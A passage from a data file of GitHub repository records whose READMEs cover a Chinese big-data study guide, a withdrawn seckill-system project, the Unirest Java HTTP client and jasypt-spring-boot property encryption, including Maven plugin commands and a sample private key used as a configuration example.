>大数据学习指南,从零开始学习大数据开发,包含大数据学习各个阶段资汇总
## 公众号
关注我的公众号:**旧时光大数据**,回复相应关键字,获取更多大数据干货、资料
“大数据学习路线”中我自己看过的视频、文档资料可以直接在公众号获取云盘链接
## 更新中。。。
#### 牛客网面经
#### 大数据面试题
### 《[大数据面试题 V4.0](https://mp.weixin.qq.com/s/NV90886HAQqBRB1hPNiIPQ)》已出,公众号回复:大数据面试题
"
qiurunze123/miaosha,master,26041,6646,2018-09-14T04:36:24Z,65690,1,⭐⭐⭐⭐秒杀系统设计与实现.互联网工程师进阶与分析🙋🐓,,"![互联网 Java 秒杀系统设计与架构](https://raw.githubusercontent.com/qiurunze123/imageall/master/miaoshashejitu.png)
> 朋友们,感谢大家对我文章的支持。时间过得很快,
这部分内容还是我几年前刚毕业时写的,而且也只是个人项目,被公众号文章给我一顿喷,博主内容我也看了,晚上回到家就简单的回复下,
想了一下,因为确实没精力维护,对于小白会造成误导,决定下线这个项目,这是我的第一个项目,就让他成回忆吧!以免对自己造成困扰!
大家以后还是可以微信交流其它问题,有时间也会为大家解答!
>1.理性看待
我本意是将一些自己的思路和方向表达出来,因为star的激增,我也就做了最初的一版规划,那时候刚毕业没多久,很荣幸这个项目从一个小项目扩张成了大项目,但也都是一些当时不成熟的想法 ,项目没有完全完成,
也只是自己练手的入门级项目,旨在学习更多的知识,所有大家在看到这个项目的时候要有更多自己的思考和过滤,不要一味的照搬照抄!最后那些不理性的同学,给大家推荐俩本书 《我就是你啊》和《非暴力沟通》没准可以让你进化!
"
Kong/unirest-java,main,2563,591,2011-04-11T21:19:53Z,3793,5,"Unirest in Java: Simplified, lightweight HTTP client library.",,"# Unirest for Java
[![Actions Status](https://github.com/kong/unirest-java/workflows/Verify/badge.svg)](https://github.com/kong/unirest-java/actions)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.konghq/unirest-java-parent/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.kong/unirest-java)
[![Javadocs](http://www.javadoc.io/badge/com.konghq/unirest-java-core.svg)](http://www.javadoc.io/doc/com.konghq/unirest-java)
## Unirest 4
Unirest 4 is build on modern Java standards, and as such requires at least Java 11.
Unirest 4's dependencies are fully modular, and have been moved to new Maven coordinates to avoid conflicts with the previous versions.
You can use a maven bom to manage the modules:
### Install With Maven
```xml
com.konghqunirest-java-bom4.3.1pomimportcom.konghqunirest-java-corecom.konghqunirest-modules-gsoncom.konghqunirest-modules-jackson
```
#### 🚨 Attention JSON users 🚨
Under Unirest 4, core no longer comes with ANY transient dependencies, and because Java itself lacks a JSON parser you MUST declare a JSON implementation if you wish to do object mappings or use Json objects.
## Upgrading from Previous Versions
See the [Upgrade Guide](UPGRADE_GUIDE.md)
## ChangeLog
See the [Change Log](CHANGELOG.md) for recent changes.
## Documentation
Our [Documentation](http://kong.github.io/unirest-java/)
## Unirest 3
### Maven
```xml
com.konghqunirest-java3.14.1
```
"
ulisesbocchio/jasypt-spring-boot,master,2788,502,2015-05-27T14:00:55Z,622,52,Jasypt integration for Spring boot,encryptable-properties encryption java java-8 java8 security spring spring-boot spring-boot-2 spring-boot-starter spring-boot2 web webapp website,"# jasypt-spring-boot
**[Jasypt](http://www.jasypt.org)** integration for Spring boot 2.x and 3.0.0
[![Build Status](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot.svg?branch=master)](https://app.travis-ci.com/ulisesbocchio/jasypt-spring-boot)
[![Gitter](https://badges.gitter.im/Join%20Chat.svg)](https://gitter.im/ulisesbocchio/jasypt-spring-boot?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge)
[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot/badge.svg?style=plastic)](https://maven-badges.herokuapp.com/maven-central/com.github.ulisesbocchio/jasypt-spring-boot)
[![Code Climate](https://codeclimate.com/github/rsercano/mongoclient/badges/gpa.svg)](https://codeclimate.com/github/ulisesbocchio/jasypt-spring-boot)
[![Codacy Badge](https://api.codacy.com/project/badge/Grade/6a75fc4e1d3f480f811b5339202400b5)](https://www.codacy.com/app/ulisesbocchio/jasypt-spring-boot?utm_source=github.com&utm_medium=referral&utm_content=ulisesbocchio/jasypt-spring-boot&utm_campaign=Badge_Grade)
[![GitHub release](https://img.shields.io/github/release/ulisesbocchio/jasypt-spring-boot.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![Github All Releases](https://img.shields.io/github/downloads/ulisesbocchio/jasypt-spring-boot/total.svg)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](https://github.com/ulisesbocchio/jasypt-spring-boot/blob/master/LICENSE)
[![volkswagen status](https://auchenberg.github.io/volkswagen/volkswargen_ci.svg?v=1)](https://github.com/ulisesbocchio/jasypt-spring-boot)
[![Paypal](https://www.paypalobjects.com/en_US/i/btn/btn_donateCC_LG.gif)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=9J2V5HJT8AZF8)
[![""Buy Me A Coffee""](https://www.buymeacoffee.com/assets/img/custom_images/yellow_img.png)](https://www.buymeacoffee.com/ulisesbd)
Jasypt Spring Boot provides Encryption support for property sources in Spring Boot Applications.
There are 3 ways to integrate `jasypt-spring-boot` in your project:
- Simply adding the starter jar `jasypt-spring-boot-starter` to your classpath if using `@SpringBootApplication` or `@EnableAutoConfiguration` will enable encryptable properties across the entire Spring Environment
- Adding `jasypt-spring-boot` to your classpath and adding `@EnableEncryptableProperties` to your main Configuration class to enable encryptable properties across the entire Spring Environment
- Adding `jasypt-spring-boot` to your classpath and declaring individual encryptable property sources with `@EncrytablePropertySource`
## What's new?
### Go to [Releases](https://github.com/ulisesbocchio/jasypt-spring-boot/releases)
## What to do First?
Use one of the following 3 methods (briefly explained above):
1. Simply add the starter jar dependency to your project if your Spring Boot application uses `@SpringBootApplication` or `@EnableAutoConfiguration` and encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, application-*.properties, yaml properties, and any other property sources can contain encrypted properties):
```xml
com.github.ulisesbocchiojasypt-spring-boot-starter3.0.5
```
2. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations then add this dependency to your project:
```xml
com.github.ulisesbocchiojasypt-spring-boot3.0.5
```
And then add `@EnableEncryptableProperties` to you Configuration class. For instance:
```java
@Configuration
@EnableEncryptableProperties
public class MyApplication {
...
}
```
And encryptable properties will be enabled across the entire Spring Environment (This means any system property, environment property, command line argument, application.properties, yaml properties, and any other custom property sources can contain encrypted properties)
3. IF you don't use `@SpringBootApplication` or `@EnableAutoConfiguration` Auto Configuration annotations and you don't want to enable encryptable properties across the entire Spring Environment, there's a third option. First add the following dependency to your project:
```xml
com.github.ulisesbocchiojasypt-spring-boot3.0.5
```
And then add as many `@EncryptablePropertySource` annotations as you want in your Configuration files. Just like you do with Spring's `@PropertySource` annotation. For instance:
```java
@Configuration
@EncryptablePropertySource(name = ""EncryptedProperties"", value = ""classpath:encrypted.properties"")
public class MyApplication {
...
}
```
Conveniently, there's also a `@EncryptablePropertySources` annotation that one could use to group annotations of type `@EncryptablePropertySource` like this:
```java
@Configuration
@EncryptablePropertySources({@EncryptablePropertySource(""classpath:encrypted.properties""),
@EncryptablePropertySource(""classpath:encrypted2.properties"")})
public class MyApplication {
...
}
```
Also, note that as of version 1.8, `@EncryptablePropertySource` supports YAML files
## Custom Environment
As of version ~~1.7~~ 1.15, a 4th method of enabling encryptable properties exists for some special cases. A custom `ConfigurableEnvironment` class is provided: ~~`EncryptableEnvironment`~~ `StandardEncryptableEnvironment` and `StandardEncryptableServletEnvironment` that can be used with `SpringApplicationBuilder` to define the custom environment this way:
```java
new SpringApplicationBuilder()
.environment(new StandardEncryptableEnvironment())
.sources(YourApplicationClass.class).run(args);
```
This method would only require using a dependency for `jasypt-spring-boot`. No starter jar dependency is required. This method is useful for early access of encrypted properties on bootstrap. While not required in most scenarios could be useful when customizing Spring Boot's init behavior or integrating with certain capabilities that are configured very early, such as Logging configuration. For a concrete example, this method of enabling encryptable properties is the only one that works with Spring Properties replacement in `logback-spring.xml` files, using the `springProperty` tag. For instance:
```xml
org.postgresql.Driverjdbc:postgresql://localhost:5432/simple${user}${password}
```
This mechanism could be used for instance (as shown) to initialize Database Logging Appender that require sensitive credentials to be passed.
Alternatively, if a custom `StringEncryptor` is needed to be provided, a static builder method is provided `StandardEncryptableEnvironment#builder` for customization (other customizations are possible):
```java
StandardEncryptableEnvironment
.builder()
.encryptor(new MyEncryptor())
.build()
```
## How everything Works?
This will trigger some configuration to be loaded that basically does 2 things:
1. It registers a Spring post processor that decorates all PropertySource objects contained in the Spring Environment so they are ""encryption aware"" and detect when properties are encrypted following jasypt's property convention.
2. It defines a default `StringEncryptor` that can be configured through regular properties, system properties, or command line arguments.
## Where do I put my encrypted properties?
When using METHODS 1 and 2 you can define encrypted properties in any of the PropertySource contained in the Environment. For instance, using the @PropertySource annotation:
```java
@SpringBootApplication
@EnableEncryptableProperties
@PropertySource(name=""EncryptedProperties"", value = ""classpath:encrypted.properties"")
public class MyApplication {
...
}
```
And your encrypted.properties file would look something like this:
```properties
secret.property=ENC(nrmZtkF7T0kjG/VodDvBw93Ct8EgjCA+)
```
Now when you do `environment.getProperty(""secret.property"")` or use `@Value(""${secret.property}"")` what you get is the decrypted version of `secret.property`.
When using METHOD 3 (`@EncryptablePropertySource`) then you can access the encrypted properties the same way, the only difference is that you must put the properties in the resource that was declared within the `@EncryptablePropertySource` annotation so that the properties can be decrypted properly.
## Password-based Encryption Configuration
Jasypt uses an `StringEncryptor` to decrypt properties. For all 3 methods, if no custom `StringEncryptor` (see the [Custom Encryptor](#customEncryptor) section for details) is found in the Spring Context, one is created automatically that can be configured through the following properties (System, properties file, command line arguments, environment variable, etc.):
Key
Required
Default Value
jasypt.encryptor.password
True
-
jasypt.encryptor.algorithm
False
PBEWITHHMACSHA512ANDAES_256
jasypt.encryptor.key-obtention-iterations
False
1000
jasypt.encryptor.pool-size
False
1
jasypt.encryptor.provider-name
False
SunJCE
jasypt.encryptor.provider-class-name
False
null
jasypt.encryptor.salt-generator-classname
False
org.jasypt.salt.RandomSaltGenerator
jasypt.encryptor.iv-generator-classname
False
org.jasypt.iv.RandomIvGenerator
jasypt.encryptor.string-output-type
False
base64
jasypt.encryptor.proxy-property-sources
False
false
jasypt.encryptor.skip-property-sources
False
empty list
The only property required is the encryption password, the rest could be left to use default values. While all this properties could be declared in a properties file, the encryptor password should not be stored in a property file, it should rather be passed as system property, command line argument, or environment variable and as far as its name is `jasypt.encryptor.password` it'll work.
The last property, `jasypt.encryptor.proxyPropertySources` is used to indicate `jasyp-spring-boot` how property values are going to be intercepted for decryption. The default value, `false` uses custom wrapper implementations of `PropertySource`, `EnumerablePropertySource`, and `MapPropertySource`. When `true` is specified for this property, the interception mechanism will use CGLib proxies on each specific `PropertySource` implementation. This may be useful on some scenarios where the type of the original `PropertySource` must be preserved.
## Use you own Custom Encryptor
For custom configuration of the encryptor and the source of the encryptor password you can always define your own StringEncryptor bean in your Spring Context, and the default encryptor will be ignored. For instance:
```java
@Bean(""jasyptStringEncryptor"")
public StringEncryptor stringEncryptor() {
PooledPBEStringEncryptor encryptor = new PooledPBEStringEncryptor();
SimpleStringPBEConfig config = new SimpleStringPBEConfig();
config.setPassword(""password"");
config.setAlgorithm(""PBEWITHHMACSHA512ANDAES_256"");
config.setKeyObtentionIterations(""1000"");
config.setPoolSize(""1"");
config.setProviderName(""SunJCE"");
config.setSaltGeneratorClassName(""org.jasypt.salt.RandomSaltGenerator"");
config.setIvGeneratorClassName(""org.jasypt.iv.RandomIvGenerator"");
config.setStringOutputType(""base64"");
encryptor.setConfig(config);
return encryptor;
}
```
Notice that the bean name is required, as `jasypt-spring-boot` detects custom String Encyptors by name as of version `1.5`. The default bean name is:
``` jasyptStringEncryptor ```
But one can also override this by defining property:
``` jasypt.encryptor.bean ```
So for instance, if you define `jasypt.encryptor.bean=encryptorBean` then you would define your custom encryptor with that name:
```java
@Bean(""encryptorBean"")
public StringEncryptor stringEncryptor() {
...
}
```
## Custom Property Detector, Prefix, Suffix and/or Resolver
As of `jasypt-spring-boot-1.10` there are new extensions points. `EncryptablePropertySource` now uses `EncryptablePropertyResolver` to resolve all properties:
```java
public interface EncryptablePropertyResolver {
String resolvePropertyValue(String value);
}
```
Implementations of this interface are responsible of both **detecting** and **decrypting** properties. The default implementation, `DefaultPropertyResolver` uses the before mentioned
`StringEncryptor` and a new `EncryptablePropertyDetector`.
### Provide a Custom `EncryptablePropertyDetector`
You can override the default implementation by providing a Bean of type `EncryptablePropertyDetector` with name `encryptablePropertyDetector` or if you wanna provide
your own bean name, override property `jasypt.encryptor.property.detector-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for
detecting encrypted properties.
Example:
```java
private static class MyEncryptablePropertyDetector implements EncryptablePropertyDetector {
@Override
public boolean isEncrypted(String value) {
if (value != null) {
return value.startsWith(""ENC@"");
}
return false;
}
@Override
public String unwrapEncryptedValue(String value) {
return value.substring(""ENC@"".length());
}
}
```
```java
@Bean(name = ""encryptablePropertyDetector"")
public EncryptablePropertyDetector encryptablePropertyDetector() {
return new MyEncryptablePropertyDetector();
}
```
### Provide a Custom Encrypted Property `prefix` and `suffix`
If all you want to do is to have different prefix/suffix for encrypted properties, you can keep using all the default implementations
and just override the following properties in `application.properties` (or `application.yml`):
```YAML
jasypt:
encryptor:
property:
prefix: ""ENC@[""
suffix: ""]""
```
### Provide a Custom `EncryptablePropertyResolver`
You can override the default implementation by providing a Bean of type `EncryptablePropertyResolver` with name `encryptablePropertyResolver` or if you wanna provide
your own bean name, override property `jasypt.encryptor.property.resolver-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for
detecting and decrypting encrypted properties.
Example:
```java
class MyEncryptablePropertyResolver implements EncryptablePropertyResolver {
private final PooledPBEStringEncryptor encryptor;
public MyEncryptablePropertyResolver(char[] password) {
this.encryptor = new PooledPBEStringEncryptor();
SimpleStringPBEConfig config = new SimpleStringPBEConfig();
config.setPasswordCharArray(password);
config.setAlgorithm(""PBEWITHHMACSHA512ANDAES_256"");
config.setKeyObtentionIterations(""1000"");
config.setPoolSize(1);
config.setProviderName(""SunJCE"");
config.setSaltGeneratorClassName(""org.jasypt.salt.RandomSaltGenerator"");
config.setIvGeneratorClassName(""org.jasypt.iv.RandomIvGenerator"");
config.setStringOutputType(""base64"");
encryptor.setConfig(config);
}
@Override
public String resolvePropertyValue(String value) {
if (value != null && value.startsWith(""{cipher}"")) {
return encryptor.decrypt(value.substring(""{cipher}"".length()));
}
return value;
}
}
```
```java
@Bean(name=""encryptablePropertyResolver"")
EncryptablePropertyResolver encryptablePropertyResolver(@Value(""${jasypt.encryptor.password}"") String password) {
return new MyEncryptablePropertyResolver(password.toCharArray());
}
```
Notice that by overriding `EncryptablePropertyResolver`, any other configuration or overrides you may have for prefixes, suffixes,
`EncryptablePropertyDetector` and `StringEncryptor` will stop working since the Default resolver is what uses them. You'd have to
wire all that stuff yourself. Fortunately, you don't have to override this bean in most cases, the previous options should suffice.
But as you can see in the implementation, the detection and decryption of the encrypted properties are internal to `MyEncryptablePropertyResolver`
## Using Filters
`jasypt-spring-boot:2.1.0` introduces a new feature to specify property filters. The filter is part of the `EncryptablePropertyResolver` API
and allows you to determine which properties or property sources to contemplate for decryption. This is, before even examining the actual
property value to search for, or try to, decrypt it. For instance, by default, all properties which name start with `jasypt.encryptor`
are excluded from examination. This is to avoid circular dependencies at load time when the library beans are configured.
### DefaultPropertyFilter properties
By default, the `DefaultPropertyResolver` uses `DefaultPropertyFilter`, which allows you to specify the following string pattern lists:
* jasypt.encryptor.property.filter.include-sources: Specify the property sources name patterns to be included for decryption
* jasypt.encryptor.property.filter.exclude-sources: Specify the property sources name patterns to be EXCLUDED for decryption
* jasypt.encryptor.property.filter.include-names: Specify the property name patterns to be included for decryption
* jasypt.encryptor.property.filter.exclude-names: Specify the property name patterns to be EXCLUDED for decryption
### Provide a custom `EncryptablePropertyFilter`
You can override the default implementation by providing a Bean of type `EncryptablePropertyFilter` with name `encryptablePropertyFilter` or if you wanna provide
your own bean name, override property `jasypt.encryptor.property.filter-bean` and specify the name you wanna give the bean. When providing this, you'll be responsible for
detecting properties and/or property sources you want to contemplate for decryption.
Example:
```java
class MyEncryptablePropertyFilter implements EncryptablePropertyFilter {
public boolean shouldInclude(PropertySource> source, String name) {
return name.startsWith('encrypted.');
}
}
```
```java
@Bean(name=""encryptablePropertyFilter"")
EncryptablePropertyFilter encryptablePropertyFilter() {
return new MyEncryptablePropertyFilter();
}
```
Notice that for this mechanism to work, you should not provide a custom `EncryptablePropertyResolver` and use the default
resolver instead. If you provide custom resolver, you are responsible for the entire process of detecting and decrypting
properties.
## Filter out `PropertySource` classes from being introspected
Define a comma-separated list of fully-qualified class names to be skipped from introspection. This classes will not be
wrapped/proxied by this plugin and thereby properties contained in them won't supported encryption/decryption:
```properties
jasypt.encryptor.skip-property-sources=org.springframework.boot.env.RandomValuePropertySource,org.springframework.boot.ansi.AnsiPropertySource
```
## Encryptable Properties cache refresh
Encrypted properties are cached within your application and in certain scenarios, like when using externalized configuration
from a config server the properties need to be refreshed when they changed. For this `jasypt-spring-boot` registers a
`RefreshScopeRefreshedEventListener` that listens to the following events by default to clear the encrypted properties cache:
```java
public static final List EVENT_CLASS_NAMES = Arrays.asList(
""org.springframework.cloud.context.scope.refresh.RefreshScopeRefreshedEvent"",
""org.springframework.cloud.context.environment.EnvironmentChangeEvent"",
""org.springframework.boot.web.servlet.context.ServletWebServerInitializedEvent""
);
```
Should you need to register extra events that you would like to trigger an encrypted cache invalidation you can add them
using the following property (separate by comma if more than one needed):
```properties
jasypt.encryptor.refreshed-event-classes=org.springframework.boot.context.event.ApplicationStartedEvent
```
## Maven Plugin
A Maven plugin is provided with a number of helpful utilities.
To use the plugin, just add the following to your pom.xml:
```xml
com.github.ulisesbocchiojasypt-maven-plugin3.0.5
```
When using this plugin, the easiest way to provide your encryption password is via a system property i.e.
-Djasypt.encryptor.password=""the password"".
By default, the plugin will consider encryption configuration in standard Spring boot configuration files under
./src/main/resources. You can also use system properties or environment variables to supply this configuration.
Keep in mind that the rest of your application code and resources are not available to the plugin because Maven plugins
do not share a classpath with projects. If your application provides encryption configuration via a StringEncryptor
bean then this will not be picked up.
In general, it is recommended to just rely on the secure default configuration.
### Encryption
To encrypt a single value run:
```bash
mvn jasypt:encrypt-value -Djasypt.encryptor.password=""the password"" -Djasypt.plugin.value=""theValueYouWantToEncrypt""
```
To encrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `DEC(...)`.
For example:
```properties
sensitive.password=DEC(secret value)
regular.property=example
```
Then run:
```bash
mvn jasypt:encrypt -Djasypt.encryptor.password=""the password""
```
Which would edit that file in place resulting in:
```properties
sensitive.password=ENC(encrypted)
regular.property=example
```
The file name and location can be customised.
### Decryption
To decrypt a single value run:
```bash
mvn jasypt:decrypt-value -Djasypt.encryptor.password=""the password"" -Djasypt.plugin.value=""DbG1GppXOsFa2G69PnmADvQFI3esceEhJYbaEIKCcEO5C85JEqGAhfcjFMGnoRFf""
```
To decrypt placeholders in `src/main/resources/application.properties`, simply wrap any string with `ENC(...)`. For
example:
```properties
sensitive.password=ENC(encrypted)
regular.property=example
```
This can be decrypted as follows:
```bash
mvn jasypt:decrypt -Djasypt.encryptor.password=""the password""
```
Which would output the decrypted contents to the screen:
```properties
sensitive.password=DEC(decrypted)
regular.property=example
```
Note that outputting to the screen, rather than editing the file in place, is designed to reduce
accidental committing of decrypted values to version control. When decrypting, you most likely
just want to check what value has been encrypted, rather than wanting to permanently decrypt that
value.
### Re-encryption
Changing the configuration for existing encrypted properties is slightly awkward using the encrypt/decrypt goals. You
must run the decrypt goal using the old configuration, then copy the decrypted output back into the original file, then
run the encrypt goal with the new configuration.
The re-encrypt goal simplifies this by re-encrypting a file in place. 2 sets of configuration must be provided. The
new configuration is supplied in the same way as you would configure the other maven goals. The old configuration
is supplied via system properties prefixed with ""jasypt.plugin.old"" instead of ""jasypt.encryptor"".
For example, to re-encrypt application.properties that was previously encrypted with the password OLD and then
encrypt with the new password NEW:
```bash
mvn jasypt:reencrypt -Djasypt.plugin.old.password=OLD -Djasypt.encryptor.password=NEW
```
*Note: All old configuration must be passed as system properties. Environment variables and Spring Boot configuration
files are not supported.*
### Upgrade
Sometimes the default encryption configuration might change between versions of jasypt-spring-boot. You can
automatically upgrade your encrypted properties to the new defaults with the upgrade goal. This will decrypt your
application.properties file using the old default configuration and re-encrypt using the new default configuration.
```bash
mvn jasypt:upgrade -Djasypt.encryptor.password=EXAMPLE
```
You can also pass the system property `-Djasypt.plugin.old.major-version` to specify the version you are upgrading from.
This will always default to the last major version where the configuration changed. Currently, the only major version
where the defaults changed is version 2, so there is no need to set this property, but it is there for future use.
### Load
You can also decrypt a properties file and load all of its properties into memory and make them accessible to Maven. This is useful when you want to make encrypted properties available to other Maven plugins.
You can chain the goals of the later plugins directly after this one. For example, with flyway:
```bash
mvn jasypt:load flyway:migrate -Djasypt.encryptor.password=""the password""
```
You can also specify a prefix for each property with `-Djasypt.plugin.keyPrefix=example.`. This
helps to avoid potential clashes with other Maven properties.
### Changing the file path
For all the above utilities, the path of the file you are encrypting/decrypting defaults to
`file:src/main/resources/application.properties`.
This can be changed using the `-Djasypt.plugin.path` system property.
You can encrypt a file in your test resources directory:
```bash
mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/test/application.properties"" -Djasypt.encryptor.password=""the password""
```
Or with a different name:
```bash
mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/resources/flyway.properties"" -Djasypt.encryptor.password=""the password""
```
Or with a different file type (the plugin supports any plain text file format including YAML):
```bash
mvn jasypt:encrypt -Djasypt.plugin.path=""file:src/main/resources/application.yaml"" -Djasypt.encryptor.password=""the password""
```
**Note that the load goal only supports .property files**
### Spring profiles and other spring config
You can override any spring config you support in your application when running the plugin, for instance selecting a given spring profile:
```bash
mvn jasypt:encrypt -Dspring.profiles.active=cloud -Djasypt.encryptor.password=""the password""
```
### Multi-module maven projects
To encrypt/decrypt properties in multi-module projects disable recursion with `-N` or `--non-recursive` on the maven command:
```bash
mvn jasypt:upgrade -Djasypt.plugin.path=file:server/src/test/resources/application-test.properties -Djasypt.encryptor.password=supersecret -N
```
## Asymmetric Encryption
`jasypt-spring-boot:2.1.1` introduces a new feature to encrypt/decrypt properties using asymmetric encryption with a pair of private/public keys
in DER or PEM formats.
### Config Properties
The following are the configuration properties you can use to config asymmetric decryption of properties;
Key
Default Value
Description
jasypt.encryptor.privateKeyString
null
private key for decryption in String format
jasypt.encryptor.privateKeyLocation
null
location of the private key for decryption in spring resource format
jasypt.encryptor.privateKeyFormat
DER
Key format. DER or PEM
You should either use `privateKeyString` or `privateKeyLocation`, the String format takes precedence if set.
To specify a private key in DER format with `privateKeyString`, please encode the key bytes to `base64`.
__Note__ that `jasypt.encryptor.password` still takes precedences for PBE encryption over the asymmetric config.
### Sample config
#### DER key as string
```yaml
jasypt:
encryptor:
privateKeyString: MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYMZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+LIQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1iG9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpAuAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMUvcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQaNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLIDYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKBV/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPazXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXuPmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPkbPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJDiy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRffumowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kIohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIBt3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSard+dewfKoPnWw0WyGFEWCg==
```
#### DER key as a resource location
```yaml
jasypt:
encryptor:
privateKeyLocation: classpath:private_key.der
```
#### PEM key as string
```yaml
jasypt:
encryptor:
privateKeyFormat: PEM
privateKeyString: |-
-----BEGIN PRIVATE KEY-----
MIIEvAIBADANBgkqhkiG9w0BAQEFAASCBKYwggSiAgEAAoIBAQCtB/IYK8E52CYM
ZTpyIY9U0HqMewyKnRvSo6s+9VNIn/HSh9+MoBGiADa2MaPKvetS3CD3CgwGq/+L
IQ1HQYGchRrSORizOcIp7KBx+Wc1riatV/tcpcuFLC1j6QJ7d2I+T7RA98Sx8X39
orqlYFQVysTw/aTawX/yajx0UlTW3rNAY+ykeQ0CBHowtTxKM9nGcxLoQbvbYx1i
G9JgAqye7TYejOpviOH+BpD8To2S8zcOSojIhixEfayay0gURv0IKJN2LP86wkpA
uAbL+mohUq1qLeWdTEBrIRXjlnrWs1M66w0l/6JwaFnGOqEB6haMzE4JWZULYYpr
2yKyoGCRAgMBAAECggEAQxURhs1v3D0wgx27ywO3zeoFmPEbq6G9Z6yMd5wk7cMU
vcpvoNVuAKCUlY4pMjDvSvCM1znN78g/CnGF9FoxJb106Iu6R8HcxOQ4T/ehS+54
kDvL999PSBIYhuOPUs62B/Jer9FfMJ2veuXb9sGh19EFCWlMwILEV/dX+MDyo1qQ
aNzbzyyyaXP8XDBRDsvPL6fPxL4r6YHywfcPdBfTc71/cEPksG8ts6um8uAVYbLI
DYcsWopjVZY/nUwsz49xBCyRcyPnlEUJedyF8HANfVEO2zlSyRshn/F+rrjD6aKB
V/yVWfTEyTSxZrBPl4I4Tv89EG5CwuuGaSagxfQpAQKBgQDXEe7FqXSaGk9xzuPa
zXy8okCX5pT6545EmqTP7/JtkMSBHh/xw8GPp+JfrEJEAJJl/ISbdsOAbU+9KAXu
PmkicFKbodBtBa46wprGBQ8XkR4JQoBFj1SJf7Gj9ozmDycozO2Oy8a1QXKhHUPk
bPQ0+w3efwoYdfE67ZodpFNhswKBgQDN9eaYrEL7YyD7951WiK0joq0BVBLK3rwO
5+4g9IEEQjhP8jSo1DP+zS495t5ruuuuPsIeodA79jI8Ty+lpYqqCGJTE6muqLMJ
Diy7KlMpe0NZjXrdSh6edywSz3YMX1eAP5U31pLk0itMDTf2idGcZfrtxTLrpRff
umowdJ5qqwKBgF+XZ+JRHDN2aEM0atAQr1WEZGNfqG4Qx4o0lfaaNs1+H+knw5kI
ohrAyvwtK1LgUjGkWChlVCXb8CoqBODMupwFAqKL/IDImpUhc/t5uiiGZqxE85B3
UWK/7+vppNyIdaZL13a1mf9sNI/p2whHaQ+3WoW/P3R5z5uaifqM1EbDAoGAN584
JnUnJcLwrnuBx1PkBmKxfFFbPeSHPzNNsSK3ERJdKOINbKbaX+7DlT4bRVbWvVj/
jcw/c2Ia0QTFpmOdnivjefIuehffOgvU8rsMeIBsgOvfiZGx0TP3+CCFDfRVqjIB
t3HAfAFyZfiP64nuzOERslL2XINafjZW5T0pZz8CgYAJ3UbEMbKdvIuK+uTl54R1
Vt6FO9T5bgtHR4luPKoBv1ttvSC6BlalgxA0Ts/AQ9tCsUK2JxisUcVgMjxBVvG0
lfq/EHpL0Wmn59SHvNwtHU2qx3Ne6M0nQtneCCfR78OcnqQ7+L+3YCMqYGJHNFSa
rd+dewfKoPnWw0WyGFEWCg==
-----END PRIVATE KEY-----
```
#### PEM key as a resource location
```yaml
jasypt:
encryptor:
privateKeyFormat: PEM
privateKeyLocation: classpath:private_key.pem
```
### Encrypting properties
